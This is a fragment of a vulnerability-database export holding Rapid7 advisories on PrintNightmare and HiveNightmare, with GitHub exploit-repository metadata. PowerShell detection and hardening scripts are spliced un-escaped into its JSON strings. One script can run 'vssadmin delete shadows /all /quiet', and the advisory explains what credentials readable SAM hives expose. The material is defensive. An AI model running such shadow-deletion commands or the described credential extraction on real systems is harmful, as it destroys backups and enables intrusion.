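        NoWarningNoElevationOnInstall             = 0
        UpdatePromptSettings                      = 0
        RestrictDriverInstallationToAdministrators = 1
    }
    foreach ($pair in $values.GetEnumerator()) {
        Set-ItemProperty -Path $PointAndPrintKey -Name $pair.Key -Value $pair.Value -Type DWord
    }
}

# Usage: report first; uncomment the second line to harden and re-check.
Test-PrintNightmareMitigation
# Set-PrintNightmareHardening; Test-PrintNightmareMitigation
```

An empty result means the registry matches the guidance; it says nothing about the patch level, so pair this with the scanner checks mentioned below.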
An exploit module is also available to Metasploit Pro customers.\n\nWe will continue to update this blog as further information comes to light.", "cvss3": {}, "published": "2021-06-30T18:15:59", "type": "rapid7blog", "title": "CVE-2021-34527 (PrintNightmare): What You Need to Know", "bulletinFamily": "info", "cvss2": {}, "cvelist": ["CVE-2020-1675", "CVE-2021-1675", "CVE-2021-34527"], "modified": "2021-06-30T18:15:59", "id": "RAPID7BLOG:45A121567763FF457DE6E50439C2605A", "href": "https://blog.rapid7.com/2021/06/30/cve-2021-1675-printnightmare-patch-does-not-remediate-vulnerability/", "cvss": {"score": 9.3, "vector": "AV:N/AC:M/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2021-07-31T08:56:21", "description": "\n\nOn Monday, July 19, 2021, community security researchers began [reporting](<https://twitter.com/jonasLyk/status/1417205166172950531>) that the Security Account Manager (SAM) database file on Windows 10 and 11 systems was readable by all local users. The SAM file stores sensitive security information such as the hashed passwords of local user and administrator accounts. Because the file is readable, an attacker with a foothold on the system can use that information to escalate privileges or access other data in the target environment.\n\nOn Tuesday, July 20, Microsoft issued an out-of-band advisory for this vulnerability, which is now tracked as [CVE-2021-36934](<https://msrc.microsoft.com/update-guide/vulnerability/CVE-2021-36934>). As of July 22, 2021, the vulnerability has been confirmed to affect Windows 10 version 1809 and later. A public proof-of-concept is available that allows non-admin users to retrieve the registry hives (SAM, SYSTEM and SECURITY) stored in that directory. 
Researcher Kevin Beaumont has also [released a demo](<https://doublepulsar.com/hivenightmare-aka-serioussam-anybody-can-read-the-registry-in-windows-10-7a871c465fa5>) that confirms CVE-2021-36934 can be used to obtain local account hashes and pass them to a remote machine, achieving remote code execution as SYSTEM on other hosts that accept those credentials (in addition to local privilege escalation). The security community has christened this vulnerability "HiveNightmare" and "SeriousSAM."\n\nCERT/CC [published in-depth vulnerability notes](<https://www.kb.cert.org/vuls/id/506989>) on CVE-2021-36934, which we highly recommend reading. Their analysis reveals that starting with Windows 10 build 1809, the BUILTIN\\Users group is given RX (read and execute) permissions on files in the `%windir%\\system32\\config` directory. The live hive files are held open by the kernel and cannot be read directly, but if a VSS shadow copy of the system drive is available, a non-privileged user can read the copies inside it and use them to:\n\n * Extract and leverage account password hashes.\n * Discover the original Windows installation password.\n * Obtain DPAPI computer keys, which can be used to decrypt all computer private keys.\n * Obtain the computer's machine account credentials, which can be used in a [silver ticket attack](<https://www.sans.org/blog/kerberos-in-the-crosshairs-golden-tickets-silver-tickets-mitm-and-more/>).\n\n**There is no patch for CVE-2021-36934 as of July 21, 2021.** Microsoft has released workarounds for Windows 10 and 11 customers that mitigate the risk of immediate exploitation; we have reproduced these workarounds in the `Mitigation Guidance` section below. Please note that Windows customers must **BOTH** restrict access and delete shadow copies to prevent exploitation of CVE-2021-36934: fixing the permissions on the live files does nothing for the copies already captured in existing shadows. We recommend applying the workarounds on an emergency basis.\n\n## Mitigation Guidance\n\n**1\\. 
Restrict access to the contents of `%windir%\\system32\\config`:**\n\n * Open Command Prompt or Windows PowerShell as an administrator.\n * Run this command, which re-enables ACL inheritance so the hive files take their permissions from the parent directory instead of the over-permissive explicit entries:\n \n \n icacls %windir%\\system32\\config\\*.* /inheritance:e\n \n\n**2\\. Delete Volume Shadow Copy Service (VSS) shadow copies:**\n\n * Delete any System Restore points and shadow volumes that existed prior to restricting access to `%windir%\\system32\\config`.\n * Create a new System Restore point if desired.\n\n**Windows 10 and 11 users must apply both workarounds to mitigate the risk of exploitation.** Microsoft has noted that deleting shadow copies may impact restore operations, including the ability to restore data with third-party backup applications.\n\nThis story is developing quickly. We will update this blog with new information as it becomes available.\n\n## Updates\n\n**July 27, 2021:** Microsoft has **removed Windows Server 2019 and Windows Server 20H2** from the list of versions affected by CVE-2021-36934.\n\n**July 22, 2021:** Microsoft added Windows Server 2019 and Windows Server 20H2 to the [list of affected versions](<https://msrc.microsoft.com/update-guide/vulnerability/CVE-2021-36934>).\n\n## Resources\n\n * [Microsoft advisory for CVE-2021-36934](<https://msrc.microsoft.com/update-guide/vulnerability/CVE-2021-36934>)\n * [CERT/CC vulnerability notes](<https://www.kb.cert.org/vuls/id/506989>)\n * [Public PoC for CVE-2021-36934](<https://github.com/GossiTheDog/HiveNightmare>)\n * [Additional demo and analysis of CVE-2021-36934](<https://doublepulsar.com/hivenightmare-aka-serioussam-anybody-can-read-the-registry-in-windows-10-7a871c465fa5>)", "cvss3": {}, "published": "2021-07-21T16:01:19", "type": "rapid7blog", "title": "Microsoft SAM File Readability CVE-2021-36934: What You Need to Know", "bulletinFamily": "info", "cvss2": {}, "cvelist": ["CVE-2021-36934"], "modified": "2021-07-21T16:01:19", "id": "RAPID7BLOG:21FF66FD08C23AC39BCCB8CFE2238507", "href": 
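The two conditions CVE-2021-36934 depends on (hive files readable by BUILTIN\Users, and a shadow copy from which to read them) can both be checked from PowerShell. The script below is an added example written for this page, not code from the Rapid7 post, Microsoft or the public PoC: it inspects the live hive ACLs and enumerates shadow copies, reports whether a non-admin could currently pull the hives, and can apply both Microsoft workarounds above. The hive names, the SID for BUILTIN\Users and the use of `vssadmin delete shadows /all` to implement workaround 2 are this example's choices.

```powershell
# Added example (not part of the Rapid7 post): check a Windows 10/11 host for
# CVE-2021-36934 exposure and, on request, apply both workarounds above.
# Run from an elevated Windows PowerShell 5.1 session.

$ConfigDir = Join-Path $env:windir 'System32\config'
$HiveNames = 'SAM', 'SYSTEM', 'SECURITY'   # the hives an attacker wants
$UsersSid  = 'S-1-5-32-545'                # well-known SID of BUILTIN\Users

function Test-AceGrantsRead {
    param([System.Security.AccessControl.FileSystemAccessRule]$Ace)
    # True for an Allow ACE carrying ReadData (0x1) or GENERIC_READ (0x80000000),
    # the two forms in which "read" appears in file ACLs.
    if ($Ace.AccessControlType -ne 'Allow') { return $false }
    $rights = [int64][int]$Ace.FileSystemRights
    return (($rights -band 0x1) -ne 0) -or (($rights -band 0x80000000) -ne 0)
}

function Get-UserReadableHives {
    # Returns the paths of live hive files whose ACL lets BUILTIN\Users read them.
    foreach ($name in $HiveNames) {
        $path = Join-Path $ConfigDir $name
        if (-not (Test-Path -Path $path)) { continue }
        foreach ($ace in (Get-Acl -Path $path).Access) {
            $sid = $ace.IdentityReference.Translate([System.Security.Principal.SecurityIdentifier]).Value
            if ($sid -eq $UsersSid -and (Test-AceGrantsRead $ace)) { $path; break }
        }
    }
}

function Get-ShadowCopies {
    # Shadow copies are what makes the bug exploitable: the live hives are
    # locked, but their copies inside a shadow are ordinary readable files.
    Get-CimInstance -ClassName Win32_ShadowCopy |
        Select-Object ID, InstallDate, VolumeName, DeviceObject
}

function Test-HiveNightmareExposure {
    $hives   = @(Get-UserReadableHives)
    $shadows = @(Get-ShadowCopies)
    $verdict = if ($hives.Count -gt 0 -and $shadows.Count -gt 0) {
        'EXPOSED: hives readable by Users and a shadow copy exists'
    } elseif ($shadows.Count -gt 0) {
        'CHECK: live ACLs are fixed, but shadows taken earlier may still hold readable hives'
    } elseif ($hives.Count -gt 0) {
        'AT RISK: ACLs still permissive; any future shadow copy becomes exploitable'
    } else { 'OK' }
    [pscustomobject]@{
        UserReadableHives = $hives
        ShadowCopyCount   = $shadows.Count
        Verdict           = $verdict
    }
}

function Invoke-HiveNightmareWorkaround {
    param([switch]$DeleteShadowCopies)
    # Workaround 1: restore ACL inheritance so the hive files take the parent
    # directory's permissions instead of the over-permissive explicit entries.
    & icacls.exe "$ConfigDir\*.*" /inheritance:e | Out-Null
    # Workaround 2: shadows created before step 1 still hold readable hives,
    # so they must go. This also deletes System Restore points (see caveat above).
    if ($DeleteShadowCopies) {
        & vssadmin.exe delete shadows /all /quiet | Out-Null
    }
}

Test-HiveNightmareExposure
# Invoke-HiveNightmareWorkaround -DeleteShadowCopies; Test-HiveNightmareExposure
```

The verdict deliberately distinguishes "ACLs fixed but shadows remain" from "fully mitigated": the ACL check only sees the live files, and a shadow copy taken before the `icacls` step still contains hives with the old permissions, which is exactly why Microsoft requires both steps.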
"https://blog.rapid7.com/2021/07/21/microsoft-sam-file-readability-cve-2021-36934-what-you-need-to-know/", "cvss": {"score": 4.6, "vector": "AV:L/AC:L/Au:N/C:P/I:P/A:P"}}], "githubexploit": [{"lastseen": "2022-03-18T14:37:24", "description": "# PrintNightmare - Windows Print Spooler RCE/LPE Vulnerability (...", "cvss3": {"exploitabilityScore": 2.8, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "baseScore": 8.8, "privilegesRequired": "NONE", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H", "userInteraction": "REQUIRED", "version": "3.1"}, "impactScore": 5.9}, "published": "2021-07-03T15:15:12", "type": "githubexploit", "title": "Exploit for Improper Privilege Management in Microsoft", "bulletinFamily": "exploit", "cvss2": {"severity": "HIGH", "exploitabilityScore": 8.6, "obtainAllPrivilege": false, "userInteractionRequired": true, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 9.3, "vectorString": "AV:N/AC:M/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "acInsufInfo": false, "impactScore": 10.0, "obtainUserPrivilege": false}, "cvelist": ["CVE-2021-1675", "CVE-2021-34527"], "modified": "2022-03-18T12:17:12", "id": "CD2BFDFF-9EBC-5C8F-83EC-62381CD9BCD5", "href": "", "cvss": {"score": 9.3, "vector": "AV:N/AC:M/Au:N/C:C/I:C/A:C"}, "privateArea": 1}, {"lastseen": "2022-03-27T21:17:11", "description": "# PrintNightmare (CVE-2021-1675)\n\nThis Zeek script detects succe...", "cvss3": {"exploitabilityScore": 2.8, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", 
"privilegesRequired": "NONE", "baseScore": 8.8, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "REQUIRED"}, "impactScore": 5.9}, "published": "2021-07-02T16:44:24", "type": "githubexploit", "title": "Exploit for Improper Privilege Management in Microsoft", "bulletinFamily": "exploit", "cvss2": {"severity": "HIGH", "exploitabilityScore": 8.6, "obtainAllPrivilege": false, "userInteractionRequired": true, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 9.3, "vectorString": "AV:N/AC:M/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 10.0, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2021-1675", "CVE-2021-34527"], "modified": "2022-03-27T16:56:12", "id": "3399B834-8492-5C0C-AA14-7F120BA37AF6", "href": "", "cvss": {"score": 9.3, "vector": "AV:N/AC:M/Au:N/C:C/I:C/A:C"}, "privateArea": 1}, {"lastseen": "2022-02-22T08:28:18", "description": "# CVE-2021-1675 / CVE-2021-34527\n\nImpacket implementation of the...", "cvss3": {"exploitabilityScore": 2.8, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "baseScore": 8.8, "privilegesRequired": "NONE", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H", "userInteraction": "REQUIRED", "version": "3.1"}, "impactScore": 5.9}, "published": "2022-02-22T03:32:14", "type": "githubexploit", "title": "Exploit for Improper Privilege Management in Microsoft", "bulletinFamily": "exploit", "cvss2": {"severity": "HIGH", "exploitabilityScore": 8.6, "obtainAllPrivilege": false, "userInteractionRequired": true, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "COMPLETE", 
"availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 9.3, "vectorString": "AV:N/AC:M/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "acInsufInfo": false, "impactScore": 10.0, "obtainUserPrivilege": false}, "cvelist": ["CVE-2021-1675", "CVE-2021-34527"], "modified": "2022-02-22T03:32:28", "id": "21F83D93-118D-50C7-A5C0-B2069237666E", "href": "", "cvss": {"score": 9.3, "vector": "AV:N/AC:M/Au:N/C:C/I:C/A:C"}, "privateArea": 1}, {"lastseen": "2022-03-24T00:25:23", "description": "# It Was All A Dream\n\nA [CVE-2021-34527](https://msrc.microsoft....", "cvss3": {"exploitabilityScore": 2.8, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 8.8, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "REQUIRED"}, "impactScore": 5.9}, "published": "2021-07-05T20:13:49", "type": "githubexploit", "title": "Exploit for Improper Privilege Management in Microsoft", "bulletinFamily": "exploit", "cvss2": {"severity": "HIGH", "exploitabilityScore": 8.6, "obtainAllPrivilege": false, "userInteractionRequired": true, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 9.3, "vectorString": "AV:N/AC:M/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 10.0, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2021-1675", "CVE-2021-34527"], "modified": "2022-03-23T19:20:20", "id": "0BB19334-D311-5464-B40B-7B27A0AD8825", "href": "", "cvss": {"score": 9.3, "vector": "AV:N/AC:M/Au:N/C:C/I:C/A:C"}, "privateArea": 1}, {"lastseen": "2021-12-10T15:22:37", "description": "# CVE-2021-1675 / 
CVE-2021-34527\n\nTwo mini Script to check if th...", "cvss3": {"exploitabilityScore": 2.8, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "baseScore": 8.8, "privilegesRequired": "NONE", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H", "userInteraction": "REQUIRED", "version": "3.1"}, "impactScore": 5.9}, "published": "2021-07-01T12:12:16", "type": "githubexploit", "title": "Exploit for Improper Privilege Management in Microsoft", "bulletinFamily": "exploit", "cvss2": {"severity": "HIGH", "exploitabilityScore": 8.6, "obtainAllPrivilege": false, "userInteractionRequired": true, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 9.3, "vectorString": "AV:N/AC:M/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "acInsufInfo": false, "impactScore": 10.0, "obtainUserPrivilege": false}, "cvelist": ["CVE-2021-1675", "CVE-2021-34527"], "modified": "2021-07-02T07:49:06", "id": "F92F972D-7309-5D0B-BCC2-054883AE83E9", "href": "", "cvss": {"score": 9.3, "vector": "AV:N/AC:M/Au:N/C:C/I:C/A:C"}, "privateArea": 1}, {"lastseen": "2021-12-10T15:28:22", "description": "# CVE-2021-1675 / CVE-2021-34527\n\nImpacket implementation of the...", "cvss3": {"exploitabilityScore": 2.8, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "baseScore": 8.8, "privilegesRequired": "NONE", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H", "userInteraction": "REQUIRED", "version": "3.1"}, "impactScore": 5.9}, "published": "2021-07-12T08:18:40", "type": "githubexploit", "title": "Exploit for Improper 
Privilege Management in Microsoft", "bulletinFamily": "exploit", "cvss2": {"severity": "HIGH", "exploitabilityScore": 8.6, "obtainAllPrivilege": false, "userInteractionRequired": true, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 9.3, "vectorString": "AV:N/AC:M/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "acInsufInfo": false, "impactScore": 10.0, "obtainUserPrivilege": false}, "cvelist": ["CVE-2021-1675", "CVE-2021-34527"], "modified": "2021-10-24T06:07:00", "id": "F1347375-6380-5145-9881-486B76875649", "href": "", "cvss": {"score": 9.3, "vector": "AV:N/AC:M/Au:N/C:C/I:C/A:C"}, "privateArea": 1}, {"lastseen": "2021-12-10T15:22:32", "description": "# Windows Print Spooler Service RCE CVE-2021-1675 (PrintNightmar...", "cvss3": {"exploitabilityScore": 2.8, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "baseScore": 8.8, "privilegesRequired": "NONE", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H", "userInteraction": "REQUIRED", "version": "3.1"}, "impactScore": 5.9}, "published": "2021-07-03T12:25:21", "type": "githubexploit", "title": "Exploit for Improper Privilege Management in Microsoft", "bulletinFamily": "exploit", "cvss2": {"severity": "HIGH", "exploitabilityScore": 8.6, "obtainAllPrivilege": false, "userInteractionRequired": true, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 9.3, "vectorString": "AV:N/AC:M/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "acInsufInfo": false, "impactScore": 10.0, "obtainUserPrivilege": false}, 
"cvelist": ["CVE-2021-1675", "CVE-2021-34527"], "modified": "2021-10-24T06:03:49", "id": "B8D9E2C0-202B-5806-88D2-B0E797582618", "href": "", "cvss": {"score": 9.3, "vector": "AV:N/AC:M/Au:N/C:C/I:C/A:C"}, "privateArea": 1}, {"lastseen": "2022-03-15T19:32:13", "description": "# Local Privilege Escalation Edition of CVE-2021-1675/CVE-2021-3...", "cvss3": {"exploitabilityScore": 2.8, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "baseScore": 8.8, "privilegesRequired": "NONE", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H", "userInteraction": "REQUIRED", "version": "3.1"}, "impactScore": 5.9}, "published": "2021-07-01T09:47:13", "type": "githubexploit", "title": "Exploit for Improper Privilege Management in Microsoft", "bulletinFamily": "exploit", "cvss2": {"severity": "HIGH", "exploitabilityScore": 8.6, "obtainAllPrivilege": false, "userInteractionRequired": true, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 9.3, "vectorString": "AV:N/AC:M/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "acInsufInfo": false, "impactScore": 10.0, "obtainUserPrivilege": false}, "cvelist": ["CVE-2021-34527", "CVE-2021-1675"], "modified": "2022-03-15T16:19:02", "id": "AAD37CB5-B2C3-5908-B0D3-052CF47F6D25", "href": "", "cvss": {"score": 9.3, "vector": "AV:N/AC:M/Au:N/C:C/I:C/A:C"}, "privateArea": 1}, {"lastseen": "2022-03-30T03:44:07", "description": "# CVE-2021-1675 / CVE-2021-34527\n\nImpacket implementation of the...", "cvss3": {"exploitabilityScore": 2.8, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", 
"integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 8.8, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "REQUIRED"}, "impactScore": 5.9}, "published": "2021-06-29T17:24:14", "type": "githubexploit", "title": "Exploit for Improper Privilege Management in Microsoft", "bulletinFamily": "exploit", "cvss2": {"severity": "HIGH", "exploitabilityScore": 8.6, "obtainAllPrivilege": false, "userInteractionRequired": true, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 9.3, "vectorString": "AV:N/AC:M/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 10.0, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2021-1675", "CVE-2021-34527"], "modified": "2022-03-30T03:06:53", "id": "E82ECEEF-07B8-5340-BAC6-FA5B0E964772", "href": "", "cvss": {"score": 9.3, "vector": "AV:N/AC:M/Au:N/C:C/I:C/A:C"}, "privateArea": 1}, {"lastseen": "2022-02-19T23:46:37", "description": "# CVE-2021-34527-CVE-2021-1675\nPrintNightmare+Manual\nhttps://sat...", "cvss3": {"exploitabilityScore": 2.8, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "baseScore": 8.8, "privilegesRequired": "NONE", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H", "userInteraction": "REQUIRED", "version": "3.1"}, "impactScore": 5.9}, "published": "2022-02-19T23:20:58", "type": "githubexploit", "title": "Exploit for Improper Privilege Management in Microsoft", "bulletinFamily": "exploit", "cvss2": {"severity": "HIGH", "exploitabilityScore": 8.6, "obtainAllPrivilege": false, "userInteractionRequired": true, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", 
"confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 9.3, "vectorString": "AV:N/AC:M/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "acInsufInfo": false, "impactScore": 10.0, "obtainUserPrivilege": false}, "cvelist": ["CVE-2021-34527", "CVE-2021-1675"], "modified": "2022-02-19T23:20:58", "id": "86F04665-0984-596F-945A-3CA176A53057", "href": "", "cvss": {"score": 9.3, "vector": "AV:N/AC:M/Au:N/C:C/I:C/A:C"}, "privateArea": 1}, {"lastseen": "2022-03-30T19:52:51", "description": "# CVE-2021-34527 - PrintNightmare LPE (PowerShell)\n\n> Caleb Stew...", "cvss3": {"exploitabilityScore": 2.8, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 8.8, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "REQUIRED"}, "impactScore": 5.9}, "published": "2021-07-02T12:10:49", "type": "githubexploit", "title": "Exploit for Improper Privilege Management in Microsoft", "bulletinFamily": "exploit", "cvss2": {"severity": "HIGH", "exploitabilityScore": 8.6, "obtainAllPrivilege": false, "userInteractionRequired": true, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 9.3, "vectorString": "AV:N/AC:M/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 10.0, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2021-1675", "CVE-2021-34527"], "modified": "2022-03-30T10:57:52", "id": "B03B4134-B4C9-5B2D-BA55-EEEA540389F4", "href": "", "cvss": {"score": 9.3, "vector": "AV:N/AC:M/Au:N/C:C/I:C/A:C"}, "privateArea": 1}, {"lastseen": 
"2022-03-16T17:02:43", "description": "= Print Nightmare \u5206\u6790\u62a5\u544a\n:imagesdir: Figures\n:toc:\n:icons: font\n:f...", "cvss3": {"exploitabilityScore": 2.8, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "baseScore": 8.8, "privilegesRequired": "NONE", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H", "userInteraction": "REQUIRED", "version": "3.1"}, "impactScore": 5.9}, "published": "2021-07-22T10:49:30", "type": "githubexploit", "title": "Exploit for Improper Privilege Management in Microsoft", "bulletinFamily": "exploit", "cvss2": {"severity": "HIGH", "exploitabilityScore": 8.6, "obtainAllPrivilege": false, "userInteractionRequired": true, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 9.3, "vectorString": "AV:N/AC:M/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "acInsufInfo": false, "impactScore": 10.0, "obtainUserPrivilege": false}, "cvelist": ["CVE-2021-34527", "CVE-2021-1675"], "modified": "2022-03-16T09:18:03", "id": "F1B229EB-2178-53B9-839E-BA0B916376A2", "href": "", "cvss": {"score": 9.3, "vector": "AV:N/AC:M/Au:N/C:C/I:C/A:C"}, "privateArea": 1}, {"lastseen": "2022-03-27T17:02:41", "description": "# PrintNightmare\n\nPython implementation for PrintNightmare (CVE-...", "cvss3": {"exploitabilityScore": 2.8, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 8.8, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "REQUIRED"}, "impactScore": 5.9}, "published": 
"2021-09-26T13:53:10", "type": "githubexploit", "title": "Exploit for Improper Privilege Management in Microsoft", "bulletinFamily": "exploit", "cvss2": {"severity": "HIGH", "exploitabilityScore": 8.6, "obtainAllPrivilege": false, "userInteractionRequired": true, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 9.3, "vectorString": "AV:N/AC:M/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 10.0, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2021-1675", "CVE-2021-34527"], "modified": "2022-03-27T13:10:07", "id": "8EDE916A-F04B-59F0-A88D-13DEF969DC00", "href": "", "cvss": {"score": 9.3, "vector": "AV:N/AC:M/Au:N/C:C/I:C/A:C"}, "privateArea": 1}, {"lastseen": "2021-12-10T15:28:13", "description": "## Kritische Sicherheitsl\u00fccke\n### PrintNightmare CVE-2021-1675, ...", "cvss3": {"exploitabilityScore": 2.8, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "baseScore": 8.8, "privilegesRequired": "NONE", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H", "userInteraction": "REQUIRED", "version": "3.1"}, "impactScore": 5.9}, "published": "2021-07-02T07:30:52", "type": "githubexploit", "title": "Exploit for Improper Privilege Management in Microsoft", "bulletinFamily": "exploit", "cvss2": {"severity": "HIGH", "exploitabilityScore": 8.6, "obtainAllPrivilege": false, "userInteractionRequired": true, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": 